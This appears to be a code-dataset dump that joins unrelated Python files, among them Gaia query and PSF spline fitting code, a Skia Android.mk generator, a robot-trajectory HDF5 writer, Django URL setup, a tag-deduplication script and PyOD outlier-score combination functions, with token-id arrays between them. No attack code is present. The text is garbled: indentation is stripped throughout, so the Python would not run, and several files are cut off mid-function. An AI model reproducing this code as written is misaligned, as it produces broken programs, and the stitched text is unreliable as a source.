phot_g_mean_flux_error, phot_g_mean_mag,
phot_bp_n_obs, phot_bp_mean_flux, phot_bp_mean_flux_error,
phot_bp_mean_mag, phot_rp_n_obs,
phot_rp_mean_flux, phot_rp_mean_flux_error,
phot_rp_mean_mag FROM (
SELECT *,
EPOCH_PROP_POS(ra, dec, parallax, pmra, pmdec, 0, ref_epoch, {epoch}) AS prop
FROM gaiaedr3.gaia_source
WHERE {where}
) AS subquery
WHERE phot_g_mean_mag<={magnitude_limit}
"""
)
else:
raise ValueError("Please pass a valid data release")
return gd.data.to_pandas()
def make_A_edges(r, f, type="quadratic"):
"""
Creates a design matrix to estimate the PSF edge (in pixels) as a function of the
flux.
Parameters
----------
r : numpy ndarray
Array with radii values
f : numpy ndarray
Array with flux values
type: string
Type of basis for the design matrix, default is quadratic in both
radius and flux
Returns
-------
A : numpy ndarray
A design matrix
"""
if type == "linear":
A = np.vstack([r ** 0, r, f]).T
elif type == "r-quadratic":
A = np.vstack([r ** 0, r, r ** 2, f]).T
elif type == "cubic":
A = np.vstack([r ** 0, r, r ** 2, r ** 3, f]).T
elif type == "exp":
A = np.vstack([r ** 0, np.exp(-r), f]).T
elif type == "inverse":
A = np.vstack([r ** 0, 1 / r, f]).T
elif type == "rf-quadratic":
A = np.vstack(
[
r ** 0,
r,
r ** 2,
r ** 0 * f,
r * f,
r ** 2 * f,
r ** 0 * f ** 2,
r * f ** 2,
r ** 2 * f ** 2,
]
).T
else:
raise ValueError("Wrong desing matrix basis type")
return A
def solve_linear_model(
A, y, y_err=None, prior_mu=None, prior_sigma=None, k=None, errors=False
):
"""
Solves a linear model with design matrix A and observations y:
Aw = y
return the solutions w for the system assuming Gaussian priors.
Alternatively the observation errors, priors, and a boolean mask for the
observations (row axis) can be provided.
Adapted from Luger, Foreman-Mackey & Hogg, 2017
(https://ui.adsabs.harvard.edu/abs/2017RNAAS...1....7L/abstract)
Parameters
----------
A : numpy ndarray or scipy sparce csr matrix
Desging matrix with solution basis
shape n_observations x n_basis
y : numpy ndarray
Observations
shape n_observations
y_err : numpy ndarray, optional
Observation errors
shape n_observations
prior_mu : float, optional
Mean of Gaussian prior values for the weights (w)
prior_sigma : float, optional
Standard deviation of Gaussian prior values for the weights (w)
k : boolean, numpy ndarray, optional
Mask that sets the observations to be used to solve the system
shape n_observations
Returns
-------
w : numpy ndarray
Array with the estimations for the weights
shape n_basis
werrs : numpy ndarray
Array with the error estimations for the weights, returned if y_err is
provided
shape n_basis
"""
if k is None:
k = np.ones(len(y), dtype=bool)
if y_err is not None:
sigma_w_inv = A[k].T.dot(A[k].multiply(1 / y_err[k, None] ** 2))
B = A[k].T.dot((y[k] / y_err[k] ** 2))
else:
sigma_w_inv = A[k].T.dot(A[k])
B = A[k].T.dot(y[k])
if prior_mu is not None and prior_sigma is not None:
sigma_w_inv += np.diag(1 / prior_sigma ** 2)
B += prior_mu / prior_sigma ** 2
if type(sigma_w_inv) == sparse.csr_matrix:
sigma_w_inv = sigma_w_inv.toarray()
if type(sigma_w_inv) == sparse.csc_matrix:
sigma_w_inv = sigma_w_inv.toarray()
if type(sigma_w_inv) == np.matrix:
sigma_w_inv = np.asarray(sigma_w_inv)
w = np.linalg.solve(sigma_w_inv, B)
if errors is True:
w_err = np.linalg.inv(sigma_w_inv).diagonal() ** 0.5
return w, w_err
return w
def _make_A_polar(phi, r, cut_r=1.5, rmin=1, rmax=5, n_r_knots=12, n_phi_knots=15):
"""
Makes a spline design matrix in polar coordinates
Parameters
----------
phi : numpy ndarray
r : numpy ndarray
cut_r : int
rmin : float
Minimum radius value for the array of knots
rmax : float
Maximum radius value for the array of knots
n_r_knots : int
Number of knots to used for the radius axis
n_phi_knots : int
Number of knots to used for the angle axis
Returns
-------
x1 : sparse matrix
Design matrix in polar coordinates using spline as base functions
"""
# create the spline bases for radius and angle
phi_spline = sparse.csr_matrix(wrapped_spline(phi, order=3, nknots=n_phi_knots).T)
r_knots = np.linspace(rmin ** 0.5, rmax ** 0.5, n_r_knots) ** 2
cut_r_int = np.where(r_knots <= cut_r)[0].max()
r_spline = sparse.csr_matrix(
np.asarray(
dmatrix(
"bs(x, knots=knots, degree=3, include_intercept=True)",
{"x": list(r), "knots": r_knots},
)
)
)
# build full desing matrix
X = sparse.hstack(
[phi_spline.multiply(r_spline[:, idx]) for idx in range(r_spline.shape[1])],
format="csr",
)
# find and remove the angle dependency for all basis for radius < 6
cut = np.arange(0, phi_spline.shape[1] * cut_r_int)
a = list(set(np.arange(X.shape[1])) - set(cut))
X1 = sparse.hstack(
[X[:, a], r_spline[:, 1:cut_r_int], sparse.csr_matrix(np.ones(X.shape[0])).T],
format="csr",
)
return X1
def wrapped_spline(input_vector, order=2, nknots=10):
"""
Creates a vector of folded-spline basis according to the input data. This is meant
to be used to build the basis vectors for periodic data, like the angle in polar
coordinates.
Parameters
----------
input_vector : numpy.ndarray
Input data to create basis, angle values MUST BE BETWEEN -PI and PI.
order : int
Order of the spline basis
nknots : int
Number of knots for the splines
Returns
-------
folded_basis : numpy.ndarray
Array of folded-spline basis
"""
if not ((input_vector > -np.pi) & (input_vector < np.pi)).all():
raise ValueError("Must be between -pi and pi")
x = np.copy(input_vector)
x1 = np.hstack([x, x + np.pi * 2])
nt = (nknots * 2) + 1
t = np.linspace(-np.pi, 3 * np.pi, nt)
dt = np.median(np.diff(t))
# Zeroth order basis
basis = np.asarray(
[
((x1 >= t[idx]) & (x1 < t[idx + 1])).astype(float)
for idx in range(len(t) - 1)
]
)
# Higher order basis
for order in np.arange(1, 4):
basis_1 = []
for idx in range(len(t) - 1):
a = ((x1 - t[idx]) / (dt * order)) * basis[idx]
if ((idx + order + 1)) < (nt - 1):
b = (-(x1 - t[(idx + order + 1)]) / (dt * order)) * basis[
(idx + 1) % (nt - 1)
]
else:
b = np.zeros(len(x1))
basis_1.append(a + b)
basis = np.vstack(basis_1)
folded_basis = np.copy(basis)[: nt // 2, : len(x)]
for idx in np.arange(-order, 0):
folded_basis[idx, :] += np.copy(basis)[nt // 2 + idx, len(x) :]
return folded_basis
| [
37811,
198,
36307,
286,
10361,
5499,
198,
37811,
198,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
1257,
310,
10141,
198,
198,
6738,
629,
541,
88,
1330,
29877,
198,
6738,
279,
1381,
88,
1330,
288,
6759,
8609,
198,
6738,
256,
80,
36... | 2.068329 | 5,854 |
#!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Functions for creating an Android.mk from already created dictionaries.
"""
import os
def write_group(f, name, items, append):
"""Helper function to list all names passed to a variable.
Args:
f: File open for writing (Android.mk)
name: Name of the makefile variable (e.g. LOCAL_CFLAGS)
items: list of strings to be passed to the variable.
append: Whether to append to the variable or overwrite it.
"""
if not items:
return
# Copy the list so we can prepend it with its name.
items_to_write = list(items)
if append:
items_to_write.insert(0, '%s +=' % name)
else:
items_to_write.insert(0, '%s :=' % name)
f.write(' \\\n\t'.join(items_to_write))
f.write('\n\n')
def write_local_vars(f, var_dict, append, name):
"""Helper function to write all the members of var_dict to the makefile.
Args:
f: File open for writing (Android.mk)
var_dict: VarsDict holding the unique values for one configuration.
append: Whether to append to each makefile variable or overwrite it.
name: If not None, a string to be appended to each key.
"""
for key in var_dict.keys():
_key = key
_items = var_dict[key]
if key == 'LOCAL_CFLAGS':
# Always append LOCAL_CFLAGS. This allows us to define some early on in
# the makefile and not overwrite them.
_append = True
elif key == 'DEFINES':
# For DEFINES, we want to append to LOCAL_CFLAGS.
_append = True
_key = 'LOCAL_CFLAGS'
_items_with_D = []
for define in _items:
_items_with_D.append('-D' + define)
_items = _items_with_D
elif key == 'KNOWN_TARGETS':
# KNOWN_TARGETS are not needed in the final make file.
continue
else:
_append = append
if name:
_key += '_' + name
write_group(f, _key, _items, _append)
AUTOGEN_WARNING = (
"""
###############################################################################
#
# THIS FILE IS AUTOGENERATED BY GYP_TO_ANDROID.PY. DO NOT EDIT.
#
# For bugs, please contact scroggo@google.com or djsollen@google.com
#
###############################################################################
"""
)
DEBUGGING_HELP = (
"""
###############################################################################
#
# PROBLEMS WITH SKIA DEBUGGING?? READ THIS...
#
# The debug build results in changes to the Skia headers. This means that those
# using libskia must also be built with the debug version of the Skia headers.
# There are a few scenarios where this comes into play:
#
# (1) You're building debug code that depends on libskia.
# (a) If libskia is built in release, then define SK_RELEASE when building
# your sources.
# (b) If libskia is built with debugging (see step 2), then no changes are
# needed since your sources and libskia have been built with SK_DEBUG.
# (2) You're building libskia in debug mode.
# (a) RECOMMENDED: You can build the entire system in debug mode. Do this by
# updating your build/core/config.mk to include -DSK_DEBUG on the line
# that defines COMMON_GLOBAL_CFLAGS
# (b) You can update all the users of libskia to define SK_DEBUG when they are
# building their sources.
#
# NOTE: If neither SK_DEBUG or SK_RELEASE are defined then Skia checks NDEBUG to
# determine which build type to use.
###############################################################################
"""
)
SKIA_TOOLS = (
"""
#############################################################
# Build the skia tools
#
# benchmark (timings)
include $(BASE_PATH)/bench/Android.mk
# diamond-master (one test to rule them all)
include $(BASE_PATH)/dm/Android.mk
"""
)
STATIC_HEADER = (
"""
###############################################################################
# STATIC LIBRARY
#
# This target is only to be used internally for only one of two purposes...
# (1) statically linking into testing frameworks
# (2) as an inclusion target for the libskia.so shared library
###############################################################################
"""
)
SHARED_HEADER = (
"""
###############################################################################
# SHARED LIBRARY
###############################################################################
"""
)
STATIC_DEPS_INFO = (
"""
###############################################################################
#
# This file contains the shared and static dependencies needed by any target
# that attempts to statically link Skia (i.e. libskia_static build target).
#
# This is a workaround for the fact that the build system does not add these
# transitive dependencies when it attempts to link libskia_static into another
# library.
#
###############################################################################
"""
)
CLEAR_VARS = ("""include $(CLEAR_VARS)\n""")
LOCAL_PATH = ("""LOCAL_PATH:= $(call my-dir)\n""")
class VarsDictData(object):
"""Helper class to keep a VarsDict along with a name and optional condition.
"""
def __init__(self, vars_dict, name, condition=None):
"""Create a new VarsDictData.
Args:
vars_dict: A VarsDict. Can be accessed via self.vars_dict.
name: Name associated with the VarsDict. Can be accessed via
self.name.
condition: Optional string representing a condition. If not None,
used to create a conditional inside the makefile.
"""
self.vars_dict = vars_dict
self.condition = condition
self.name = name
def write_static_deps_mk(target_dir, common, deviations_from_common):
"""Given all the variables, write the final make file.
Args:
target_dir: The full path to the directory to write skia_static_includes.mk,
or None to use the current working directory.
common: VarsDict holding variables definitions common to all
configurations.
deviations_from_common: List of VarsDictData, one for each possible
configuration. VarsDictData.name will be appended to each key before
writing it to the makefile. VarsDictData.condition, if not None, will be
written to the makefile as a condition to determine whether to include
VarsDictData.vars_dict.
"""
target_file = 'skia_static_deps.mk'
if target_dir:
target_file = os.path.join(target_dir, target_file)
with open(target_file, 'w') as f:
f.write(AUTOGEN_WARNING)
f.write(STATIC_DEPS_INFO)
for data in deviations_from_common:
var_dict_shared = data.vars_dict['LOCAL_SHARED_LIBRARIES']
var_dict_static = data.vars_dict['LOCAL_STATIC_LIBRARIES']
if data.condition and (var_dict_shared or var_dict_static):
f.write('ifeq ($(%s), true)\n' % data.condition)
write_group(f, 'LOCAL_SHARED_LIBRARIES', var_dict_shared, True)
write_group(f, 'LOCAL_STATIC_LIBRARIES', var_dict_static, True)
if data.condition and (var_dict_shared or var_dict_static):
f.write('endif\n\n')
write_group(f, 'LOCAL_SHARED_LIBRARIES', common['LOCAL_SHARED_LIBRARIES'],
True)
write_group(f, 'LOCAL_STATIC_LIBRARIES', common['LOCAL_STATIC_LIBRARIES'],
True)
def write_android_mk(target_dir, common, deviations_from_common):
"""Given all the variables, write the final make file.
Args:
target_dir: The full path to the directory to write Android.mk, or None
to use the current working directory.
common: VarsDict holding variables definitions common to all
configurations.
deviations_from_common: List of VarsDictData, one for each possible
configuration. VarsDictData.name will be appended to each key before
writing it to the makefile. VarsDictData.condition, if not None, will be
written to the makefile as a condition to determine whether to include
VarsDictData.vars_dict.
"""
target_file = 'Android.mk'
if target_dir:
target_file = os.path.join(target_dir, target_file)
with open(target_file, 'w') as f:
f.write(AUTOGEN_WARNING)
f.write('BASE_PATH := $(call my-dir)\n')
f.write(LOCAL_PATH)
f.write(DEBUGGING_HELP)
f.write(STATIC_HEADER)
f.write(CLEAR_VARS)
# need flags to enable feedback driven optimization (FDO) when requested
# by the build system.
f.write('LOCAL_FDO_SUPPORT := true\n')
f.write('ifneq ($(strip $(TARGET_FDO_CFLAGS)),)\n')
f.write('\t# This should be the last -Oxxx specified in LOCAL_CFLAGS\n')
f.write('\tLOCAL_CFLAGS += -O2\n')
f.write('endif\n\n')
f.write('LOCAL_ARM_MODE := thumb\n')
f.write('# used for testing\n')
f.write('#LOCAL_CFLAGS += -g -O0\n\n')
# update the provided LOCAL_MODULE with a _static suffix
local_module = common['LOCAL_MODULE'][0]
static_local_module = local_module + '_static'
common['LOCAL_MODULE'].reset()
common['LOCAL_MODULE'].add(static_local_module)
write_local_vars(f, common, False, None)
for data in deviations_from_common:
if data.condition:
f.write('ifeq ($(%s), true)\n' % data.condition)
write_local_vars(f, data.vars_dict, True, data.name)
if data.condition:
f.write('endif\n\n')
f.write('LOCAL_MODULE_CLASS := STATIC_LIBRARIES\n')
f.write('include $(BUILD_STATIC_LIBRARY)\n\n')
f.write(SHARED_HEADER)
f.write(CLEAR_VARS)
f.write('LOCAL_MODULE_CLASS := SHARED_LIBRARIES\n')
f.write('LOCAL_MODULE := %s\n' % local_module)
f.write('LOCAL_WHOLE_STATIC_LIBRARIES := %s\n' % static_local_module)
write_group(f, 'LOCAL_EXPORT_C_INCLUDE_DIRS',
common['LOCAL_EXPORT_C_INCLUDE_DIRS'], False)
f.write('include $(BASE_PATH)/skia_static_deps.mk\n')
f.write('include $(BUILD_SHARED_LIBRARY)\n')
f.write(SKIA_TOOLS)
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
2,
15069,
1946,
3012,
3457,
13,
198,
2,
198,
2,
5765,
286,
428,
2723,
2438,
318,
21825,
416,
257,
347,
10305,
12,
7635,
5964,
326,
460,
307,
198,
2,
1043,
287,
262,
38559,
24290,
239... | 2.824103 | 3,485 |
import numpy as np
import time
import os
import os.path as osp
import roboverse
from roboverse.policies import policies
import argparse
from tqdm import tqdm
import h5py
from roboverse.utils import get_timestamp
EPSILON = 0.1
def dump2h5(traj, path, image_rendered):
"""Dumps a collected trajectory to HDF5 file."""
# convert to numpy arrays
states = np.array([o['state'] for o in traj['observations']])
if image_rendered:
images = np.array([o['image'] for o in traj['observations']])
actions = np.array(traj['actions'])
rewards = np.array(traj['rewards'])
terminals = np.array(traj['terminals'])
# create HDF5 file
f = h5py.File(path, "w")
f.create_dataset("traj_per_file", data=1)
# store trajectory info in traj0 group
traj_data = f.create_group("traj0")
traj_data.create_dataset("states", data=states)
if image_rendered:
traj_data.create_dataset("images", data=images, dtype=np.uint8)
traj_data.create_dataset("actions", data=actions)
traj_data.create_dataset("rewards", data=rewards)
if np.sum(terminals) == 0:
terminals[-1] = True
# build pad-mask that indicates how long sequence is
is_terminal_idxs = np.nonzero(terminals)[0]
pad_mask = np.zeros((len(terminals),))
pad_mask[:is_terminal_idxs[0]] = 1.
traj_data.create_dataset("pad_mask", data=pad_mask)
f.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--env-name", type=str, required=True)
parser.add_argument("-nt", "--num-task", type=int, default=3)
parser.add_argument("-pl", "--policy-name", type=str, required=True)
parser.add_argument("-a", "--accept-trajectory-key", type=str, required=True)
parser.add_argument("-n", "--num-trajectories", type=int, required=True)
parser.add_argument("-t", "--num-timesteps", type=int, required=True)
parser.add_argument("--save-all", action='store_true', default=False)
parser.add_argument("--gui", action='store_true', default=False)
parser.add_argument("-o", "--target-object", type=str)
parser.add_argument("-d", "--save-directory", type=str, default=""),
parser.add_argument("--noise", type=float, default=0.1)
parser.add_argument("-r", "--image-rendered", type=int, default=0)
parser.add_argument("-f", "--full-reward", type=int, default=0)
args = parser.parse_args()
main(args)
| [
11748,
299,
32152,
355,
45941,
198,
11748,
640,
198,
11748,
28686,
198,
11748,
28686,
13,
6978,
355,
267,
2777,
198,
11748,
686,
2127,
4399,
198,
6738,
686,
2127,
4399,
13,
79,
4160,
444,
1330,
4788,
198,
11748,
1822,
29572,
198,
6738,
... | 2.52648 | 963 |
from django.contrib import admin
from django.urls import path, include
from django.views.generic.base import RedirectView
from rest_framework_swagger import renderers
from rest_framework import exceptions
from rest_framework.permissions import AllowAny
from rest_framework.renderers import CoreJSONRenderer
from rest_framework.response import Response
from rest_framework.schemas import SchemaGenerator
from rest_framework.views import APIView
from api import urls as api_urls
from web_api import urls as webapi_urls
def get_swagger_view(title=None, url=None, patterns=None, urlconf=None, description=None):
"""
Returns schema view which renders Swagger/OpenAPI.
"""
return SwaggerSchemaView.as_view()
mantis_schema_view = get_swagger_view(
title='MantisTable API',
url="/api",
urlconf=api_urls,
description="MantisTable API allows to identify annotations (Entity Linking, Predicate Annotation, Concept Annotation) by using a non-destructive, incremental approach"
)
frontend_schema_view = get_swagger_view(
title='Frontend API',
url="/webapi",
urlconf=webapi_urls,
description="MantisTable Frontend API"
)
urlpatterns = [
path('', RedirectView.as_view(url='dashboard', permanent=False), name='index'),
path('dashboard/', include('dashboard.urls')),
path('webapi/', include('web_api.urls')),
path('webapi/', frontend_schema_view),
path('api/', include('api.urls')),
path('api/', mantis_schema_view),
path('admin/', admin.site.urls)
]
| [
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
6738,
42625,
14208,
13,
6371,
82,
1330,
3108,
11,
2291,
198,
6738,
42625,
14208,
13,
33571,
13,
41357,
13,
8692,
1330,
2297,
1060,
7680,
198,
198,
6738,
1334,
62,
30604,
62,
2032,
7... | 2.963178 | 516 |
#!_PYTHONLOC
#
# (C) COPYRIGHT 2014 Ahasuerus
# ALL RIGHTS RESERVED
#
# The copyright notice above does not evidence any actual or
# intended publication of such source code.
#
# Version: $Revision$
# Date: $Date$
import cgi
import sys
import os
import string
import MySQLdb
from localdefs import *
if __name__ == '__main__':
db = MySQLdb.connect(DBASEHOST, USERNAME, PASSWORD, conv=IsfdbConvSetup())
db.select_db(DBASE)
# Find all duplicate tags
query = "select tag_id,title_id,user_id,count(*) as xx from tag_mapping group by tag_id,title_id,user_id having xx > 1"
db.query(query)
result = db.store_result()
tag_count = result.num_rows()
record = result.fetch_row()
tags = []
while record:
tags.append(record[0])
record = result.fetch_row()
row_count = 0
for tag in tags:
tag_id = tag[0]
title_id = tag[1]
user_id = tag[2]
row_count += int(tag[3])
update = "delete from tag_mapping where tag_id=%d and title_id=%d and user_id=%d" % (int(tag_id), int(title_id), int(user_id))
db.query(update)
update = "insert into tag_mapping(tag_id, title_id, user_id) values(%d, %d, %d)" % (int(tag_id), int(title_id), int(user_id))
db.query(update)
print "Total processed: %d rows in %d tags" % (row_count, tag_count)
| [
2,
0,
62,
47,
56,
4221,
1340,
29701,
198,
2,
198,
2,
220,
220,
220,
220,
357,
34,
8,
27975,
38162,
9947,
1946,
220,
220,
7900,
292,
15573,
385,
198,
2,
220,
220,
220,
220,
220,
220,
11096,
371,
34874,
15731,
1137,
53,
1961,
198,... | 2.216641 | 637 |
# -*- coding: utf-8 -*-
"""A collection of model combination functionalities.
"""
# Author: Yue Zhao <zhaoy@cmu.edu>
# License: BSD 2 clause
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.random import RandomState
from sklearn.utils import check_array
from sklearn.utils import column_or_1d
# noinspection PyProtectedMember
from sklearn.utils import shuffle
from sklearn.utils.random import sample_without_replacement
from sklearn.utils.testing import assert_equal
from ..utils.utility import check_parameter
def _aom_moa_helper(mode, scores, n_buckets, method, bootstrap_estimators,
random_state):
"""Internal helper function for Average of Maximum (AOM) and
Maximum of Average (MOA). See :cite:`aggarwal2015theoretical` for details.
First dividing estimators into subgroups, take the maximum/average score
as the subgroup score. Finally, take the average/maximum of all subgroup
outlier scores.
Parameters
----------
mode : str
Define the operation model, either "AOM" or "MOA".
scores : numpy array of shape (n_samples, n_estimators)
The score matrix outputted from various estimators.
n_buckets : int, optional (default=5)
The number of subgroups to build.
method : str, optional (default='static')
{'static', 'dynamic'}, if 'dynamic', build subgroups
randomly with dynamic bucket size.
bootstrap_estimators : bool, optional (default=False)
Whether estimators are drawn with replacement.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the
random number generator; If RandomState instance, random_state is
the random number generator; If None, the random number generator
is the RandomState instance used by `np.random`.
Returns
-------
combined_scores : Numpy array of shape (n_samples,)
The combined outlier scores.
"""
if mode != 'AOM' and mode != 'MOA':
raise NotImplementedError(
'{mode} is not implemented'.format(mode=mode))
scores = check_array(scores)
# TODO: add one more parameter for max number of estimators
# use random_state instead
# for now it is fixed at n_estimators/2
n_estimators = scores.shape[1]
check_parameter(n_buckets, 2, n_estimators, param_name='n_buckets')
scores_buckets = np.zeros([scores.shape[0], n_buckets])
if method == 'static':
n_estimators_per_bucket = int(n_estimators / n_buckets)
if n_estimators % n_buckets != 0:
raise ValueError('n_estimators / n_buckets has a remainder. Not '
'allowed in static mode.')
if not bootstrap_estimators:
# shuffle the estimator order
shuffled_list = shuffle(list(range(0, n_estimators, 1)),
random_state=random_state)
head = 0
for i in range(0, n_estimators, n_estimators_per_bucket):
tail = i + n_estimators_per_bucket
batch_ind = int(i / n_estimators_per_bucket)
if mode == 'AOM':
scores_buckets[:, batch_ind] = np.max(
scores[:, shuffled_list[head:tail]], axis=1)
else:
scores_buckets[:, batch_ind] = np.mean(
scores[:, shuffled_list[head:tail]], axis=1)
# increment index
head = head + n_estimators_per_bucket
# noinspection PyUnusedLocal
else:
for i in range(n_buckets):
ind = sample_without_replacement(n_estimators,
n_estimators_per_bucket,
random_state=random_state)
if mode == 'AOM':
scores_buckets[:, i] = np.max(scores[:, ind], axis=1)
else:
scores_buckets[:, i] = np.mean(scores[:, ind], axis=1)
elif method == 'dynamic': # random bucket size
for i in range(n_buckets):
# the number of estimators in a bucket should be 2 - n/2
max_estimator_per_bucket = RandomState(seed=random_state).randint(
2, int(n_estimators / 2))
ind = sample_without_replacement(n_estimators,
max_estimator_per_bucket,
random_state=random_state)
if mode == 'AOM':
scores_buckets[:, i] = np.max(scores[:, ind], axis=1)
else:
scores_buckets[:, i] = np.mean(scores[:, ind], axis=1)
else:
raise NotImplementedError(
'{method} is not implemented'.format(method=method))
if mode == 'AOM':
return np.mean(scores_buckets, axis=1)
else:
return np.max(scores_buckets, axis=1)
def aom(scores, n_buckets=5, method='static', bootstrap_estimators=False,
random_state=None):
"""Average of Maximum - An ensemble method for combining multiple
estimators. See :cite:`aggarwal2015theoretical` for details.
First dividing estimators into subgroups, take the maximum score as the
subgroup score. Finally, take the average of all subgroup outlier scores.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
The score matrix outputted from various estimators
n_buckets : int, optional (default=5)
The number of subgroups to build
method : str, optional (default='static')
{'static', 'dynamic'}, if 'dynamic', build subgroups
randomly with dynamic bucket size.
bootstrap_estimators : bool, optional (default=False)
Whether estimators are drawn with replacement.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the
random number generator; If RandomState instance, random_state is
the random number generator; If None, the random number generator
is the RandomState instance used by `np.random`.
Returns
-------
combined_scores : Numpy array of shape (n_samples,)
The combined outlier scores.
"""
return _aom_moa_helper('AOM', scores, n_buckets, method,
bootstrap_estimators, random_state)
def moa(scores, n_buckets=5, method='static', bootstrap_estimators=False,
random_state=None):
"""Maximization of Average - An ensemble method for combining multiple
estimators. See :cite:`aggarwal2015theoretical` for details.
First dividing estimators into subgroups, take the average score as the
subgroup score. Finally, take the maximization of all subgroup outlier
scores.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
The score matrix outputted from various estimators
n_buckets : int, optional (default=5)
The number of subgroups to build
method : str, optional (default='static')
{'static', 'dynamic'}, if 'dynamic', build subgroups
randomly with dynamic bucket size.
bootstrap_estimators : bool, optional (default=False)
Whether estimators are drawn with replacement.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the
random number generator; If RandomState instance, random_state is
the random number generator; If None, the random number generator
is the RandomState instance used by `np.random`.
Returns
-------
combined_scores : Numpy array of shape (n_samples,)
The combined outlier scores.
"""
return _aom_moa_helper('MOA', scores, n_buckets, method,
bootstrap_estimators, random_state)
def average(scores, estimator_weights=None):
"""Combination method to merge the outlier scores from multiple estimators
by taking the average.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
Score matrix from multiple estimators on the same samples.
estimator_weights : list of shape (1, n_estimators)
If specified, using weighted average
Returns
-------
combined_scores : numpy array of shape (n_samples, )
The combined outlier scores.
"""
scores = check_array(scores)
if estimator_weights is not None:
if estimator_weights.shape != (1, scores.shape[1]):
raise ValueError(
'Bad input shape of estimator_weight: (1, {score_shape}),'
'and {estimator_weights} received'.format(
score_shape=scores.shape[1],
estimator_weights=estimator_weights.shape))
# (d1*w1 + d2*w2 + ...+ dn*wn)/(w1+w2+...+wn)
# generated weighted scores
scores = np.sum(np.multiply(scores, estimator_weights),
axis=1) / np.sum(estimator_weights)
return scores.ravel()
else:
return np.mean(scores, axis=1).ravel()
def maximization(scores):
"""Combination method to merge the outlier scores from multiple estimators
by taking the maximum.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
Score matrix from multiple estimators on the same samples.
Returns
-------
combined_scores : numpy array of shape (n_samples, )
The combined outlier scores.
"""
scores = check_array(scores)
return np.max(scores, axis=1).ravel()
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
32,
4947,
286,
2746,
6087,
10345,
871,
13,
198,
37811,
198,
2,
6434,
25,
32854,
29436,
1279,
89,
3099,
726,
31,
11215,
84,
13,
15532,
29,
198,
2,
13789,
25,
3... | 2.433816 | 4,004 |
from des import DES
des = DES(key=193)
number = 123456
ciphertext = des.encrypt_number(number)
decrypted = des.decrypt_number(ciphertext)
print('Number:', number)
print('Encrypted:', ciphertext)
print('Decrypyed', decrypted)
| [
6738,
748,
1330,
22196,
628,
198,
8906,
796,
22196,
7,
2539,
28,
24943,
8,
198,
17618,
796,
17031,
29228,
198,
66,
10803,
5239,
796,
748,
13,
12685,
6012,
62,
17618,
7,
17618,
8,
198,
12501,
15109,
796,
748,
13,
12501,
6012,
62,
176... | 2.886076 | 79 |
import sys
import warnings
import numpy as np
from progressbar import progressbar
from lib.config import Config
from utils.evaluator import Evaluator
warnings.simplefilter('ignore', np.RankWarning)
if __name__ == "__main__":
cfg = Config(sys.argv[1] if len(sys.argv) > 1 else 'config.yaml')
dataset = cfg.get_dataset('test')
for n in range(1, 5 + 1):
result = polyfit_upperbound(dataset, n)
print('Degree {} upperbound:'.format(n))
for metric in result:
if metric['name'] == 'Accuracy':
print('\t{}: {:.2f}'.format(metric['name'], metric['value'] * 100))
else:
print('\t{}: {:.3f}'.format(metric['name'], metric['value']))
| [
11748,
25064,
198,
11748,
14601,
198,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
4371,
5657,
1330,
4371,
5657,
198,
198,
6738,
9195,
13,
11250,
1330,
17056,
198,
6738,
3384,
4487,
13,
18206,
84,
1352,
1330,
26439,
84,
1352,
198,
198... | 2.325806 | 310 |
import resnet_v1_101_rcnn
import resnet_v1_101_rcnn_dcn
import resnet_v1_101_rcnn_dcn_dense
| [
11748,
581,
3262,
62,
85,
16,
62,
8784,
62,
6015,
20471,
201,
198,
11748,
581,
3262,
62,
85,
16,
62,
8784,
62,
6015,
20471,
62,
17896,
77,
201,
198,
11748,
581,
3262,
62,
85,
16,
62,
8784,
62,
6015,
20471,
62,
17896,
77,
62,
67,... | 1.979167 | 48 |
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='jdma_control',
version='0.2.27',
packages=['jdma_control'],
install_requires=[
'appdirs',
'beautifulsoup4',
'boto3',
'django',
'django-extensions',
'django-multiselectfield',
'django-sizefield',
'html5lib',
'lxml',
'jasmin-ldap',
'packaging',
'psycopg2-binary',
'pycryptodome',
'pyparsing',
'pytz',
'requests'
],
include_package_data=True,
license='my License', # example license
description=('A Django app to migrate directories of files to external'
'storage from groupworkspaces on JASMIN.'),
long_description=README,
url='http://www.ceda.ac.uk/',
author='Neil Massey',
author_email='neil.massey@stfc.ac.uk',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License', # example license
'Operating System :: OS Independent',
'Programming Language :: Python',
# Replace these appropriately if you are stuck on Python 2.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| [
11748,
28686,
198,
6738,
900,
37623,
10141,
1330,
9058,
198,
198,
4480,
1280,
7,
418,
13,
6978,
13,
22179,
7,
418,
13,
6978,
13,
15908,
3672,
7,
834,
7753,
834,
828,
705,
15675,
11682,
13,
9132,
6,
4008,
355,
1100,
1326,
25,
198,
... | 2.293243 | 740 |
import os
import csv
from tqdm.autonotebook import tqdm
csv_file = open("ecmwf_cca_scratch.csv", "w")
writer = csv.writer(csv_file)
writer.writerow(['mip_era','activity_id','institution_id','source_id','experiment_id','member_id','table_id','variable_id','grid_label','version','dcpp_start_year','time_range','nc_path'])
for store in ['CMIP6', 'PRIMAVERA']: # 46 & 12 secs, respectively
